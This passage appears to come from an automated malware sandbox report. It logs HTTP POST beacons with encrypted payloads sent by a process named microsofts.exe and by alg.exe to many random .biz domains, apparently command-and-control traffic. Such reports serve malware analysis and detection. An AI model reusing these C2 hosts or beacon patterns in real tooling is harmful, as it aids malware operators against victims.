                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.190584898 CET778OUTData Raw: 2e 8b 9a 68 c1 5f b9 7d fe 02 00 00 64 e8 9a 86 65 ad a4 a3 9a f0 85 5d d8 51 82 44 aa 38 c8 66 08 65 b4 36 da e3 70 d4 d4 7f c1 a0 91 ed 32 9c 47 17 94 b5 a6 48 6f ae d1 99 22 89 c8 fb a8 57 f7 46 c9 58 ba 8a 2c 70 25 aa d2 b9 2a ac 6c 81 d6 55
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .h_}de]QD8fe6p2GHo"WFX,p%*lU7P$?)gzl,c=$1~61Ad:Q28$]@GBv=2(f}j2]@hG1e5a2o2PR{T>zdKPIklL!) &omKP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.028856993 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=1ad230217069323dabbd860404cd2878|173.254.250.76|1730822621|1730822621|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              50192.168.2.55964618.208.156.248801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.471607924 CET352OUTPOST /dxiykgktglw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.471630096 CET828OUTData Raw: ca b0 9b f9 b2 7e e2 4b 30 03 00 00 82 1d dd f7 98 57 82 13 e7 a8 a1 77 1c d3 d1 cb 72 e0 89 34 ab 75 33 1f 73 c5 1a f4 94 bf 43 3e fe 5e 29 11 1b e3 7a 05 df 45 b6 42 c1 98 78 26 69 01 59 4a 54 f2 74 3f 41 ba eb e9 b1 4e cc 46 11 dd 06 6d 8d 5a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ~K0Wwr4u3sC>^)zEBx&iYJTt?ANFmZM`9U:>E7zjW]H%B6S-]CaLV3Lfn0FOZT#1\NoP~+PWo4I%p'ZawcHgyU
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.134263039 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=8825c8a88cb8890f6d921abd08a40a3e|173.254.250.76|1730822622|1730822622|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              51192.168.2.559652208.100.26.245801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.189733982 CET347OUTPOST /jwx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.189766884 CET828OUTData Raw: d2 08 e6 3a 21 b4 58 c5 30 03 00 00 c8 72 20 cd df 20 fb 0c b2 0b 21 49 45 ab 51 92 31 d4 d3 b5 b0 6b 3d 51 5d 47 10 c2 93 6f 8c a0 46 d4 f6 a3 f8 76 3a 20 e4 ed ae 70 e5 73 35 2b ce 32 54 8c e9 6d 39 93 6a 89 f2 3e 6a da de 7e 25 c5 e2 c9 c3 a8
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :!X0r !IEQ1k=Q]GoFv: ps5+2Tm9j>j~%&bA>agV)TOzvp{$aPni5<'7HhH6J^i*@Y,FI2rWgvhm5V!3>r\S#ViS(aV6[/
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.824763060 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.864799023 CET357OUTPOST /ymfaswtstxnaa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.864799023 CET828OUTData Raw: 6c 0e 55 6e 09 76 a6 1c 30 03 00 00 5b f0 40 be b6 f2 f2 51 b8 a9 cf 17 ff eb 27 10 da c5 30 4f 86 32 f6 84 14 c4 4e 29 38 3d a3 f5 fc c8 5c ef 74 33 54 20 50 81 86 02 da 19 f7 e8 e6 0d 29 47 9b a4 e2 31 98 45 cf 2e 55 86 f3 cb 26 69 46 6d 21 21
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: lUnv0[@Q'0O2N)8=\t3T P)G1E.U&iFm!!If{]i!UkMQkxij7j^SKG[|cccJ-.p2t nP<`Bcv=D8=j#+ gNuW&dmO`J7
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.011395931 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              52192.168.2.55965318.141.10.107801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.538019896 CET347OUTPOST /glpq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.538038969 CET778OUTData Raw: e6 80 73 8c da d2 31 70 fe 02 00 00 48 ff ec a0 52 84 a6 04 82 c2 81 b0 35 3b 1e 1f 65 b0 ef 07 c2 de da 81 8b 48 63 c6 8b 12 25 ed ad 99 ea 1c 96 2c 11 d5 5f 33 6a 08 81 04 76 b2 79 99 b3 72 4a 6d 17 16 4b f1 31 50 75 dc 60 72 a0 bd 7a ec e6 97
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: s1pHR5;eHc%,_3jvyrJmK1Pu`rzLaLx0NZUy8! nI(GxhC[0D<7(;Bi{DSmXCvL*}SQ,5:4y& f1b`DrG!3XsE+4
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.979379892 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=e14a9defdaa587cefd8dfb7ba931a182|173.254.250.76|1730822623|1730822623|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              53192.168.2.55966013.251.16.150801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.076834917 CET353OUTPOST /vmxdnohruim HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.076880932 CET828OUTData Raw: ea 0f 72 fe ac 5d 0e e0 30 03 00 00 36 2a 68 45 73 d7 5e ce 9b 80 5b d3 96 6d b2 ff b8 06 9c 85 68 05 92 6c cf bf 03 89 4a 75 a6 b3 2d 59 36 d5 fe 99 8b 46 2f 1b 33 57 31 b0 1e 35 80 40 2a 5e 67 99 5d 15 20 aa b4 d2 67 13 28 8a cf 3e 2a ed f1 18
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r]06*hEs^[mhlJu-Y6F/3W15@*^g] g(>*ju\p@AU`{E?Ln*PuQk8ViTW<hqh6w2^`J]bm#4wqUh.?Ac.8~UNc<Tr9'_
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.502327919 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=82660fe137c9f28fcc3e6de66902a0a1|173.254.250.76|1730822624|1730822624|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              54192.168.2.55966618.208.156.248801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.212300062 CET355OUTPOST /qwtkmqbsexpiki HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.212440968 CET778OUTData Raw: b7 38 e9 e5 b9 16 e2 82 fe 02 00 00 47 69 87 5e 64 ef 1b 16 0b d1 21 ba 50 9b b7 7d a9 4b 67 26 00 5c 78 5c 04 c6 97 29 f2 e4 14 04 f4 50 27 db fd e2 8d 78 90 a1 1b 10 82 48 27 81 14 9f f6 eb c7 02 98 b2 d5 2c a0 c8 ff c3 6c f5 18 81 02 2c 66 39
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 8Gi^d!P}Kg&\x\)P'xH',l,f98> u18KL\Q)LII25TQ"TtL6*r4M^HUs{-%[Bqj])T:=Gdz`-YIs}|Asnz&K:WS+L
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.869647980 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7860de31d48116106184b6d344aa6a63|173.254.250.76|1730822624|1730822624|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              55192.168.2.55966744.221.84.105801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.553659916 CET357OUTPOST /nnsrvdrwdsdf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.553705931 CET828OUTData Raw: c2 6f fa 53 4e 7c 04 e0 30 03 00 00 03 21 42 6a e8 ec 90 49 e4 3c d8 64 ab e1 99 b0 e6 c7 f6 5b a0 7e 78 47 31 98 b5 39 d3 fc a0 77 ed 73 97 69 d6 ff 40 c4 3e 73 20 ac 42 8f ef ed d9 3c a2 83 dc ac d9 77 e2 6b b5 df c8 be c7 2d 72 ec ca 61 0f d6
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: oSN|0!BjI<d[~xG19wsi@>s B<wk-razt06+^ii{U/&WUz;X*s:o//-ALq><pAxWbTA>oU Q,)CRWGumqKH>7?Wo=1|
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.208004951 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a1f27b73967c20a875cc0b3a03cc1a84|173.254.250.76|1730822625|1730822625|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              56192.168.2.55967344.221.84.105801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.112466097 CET359OUTPOST /alkfibvhvyencmw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.112466097 CET778OUTData Raw: 5c 21 2f 61 6c 56 a5 01 fe 02 00 00 07 88 cf 9c 2e d6 93 5f 04 71 fc 6c b5 f4 d6 39 fe 59 86 96 4f 87 d9 ea 6e 24 b8 c3 57 0e a7 94 46 85 fd 9f 89 5e 9f 1a 45 83 f3 94 11 0a 87 b9 53 85 90 0d 36 42 47 70 c8 a5 54 d3 18 88 6b aa 67 53 f4 ff 40 2c
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: \!/alV._ql9YOn$WF^ES6BGpTkgS@,%/%E"IW.C.u-Db6&9[/bhlp]Mgt>\[H"3PXyTO.?"m$L3-O}T*8'f7!J;u!$B-&Lu@X"
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.765846014 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=01b470141b693b954c34d9cc126cfb07|173.254.250.76|1730822625|1730822625|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              57192.168.2.55967454.244.188.177801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.253659010 CET355OUTPOST /qunavwbhgmi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
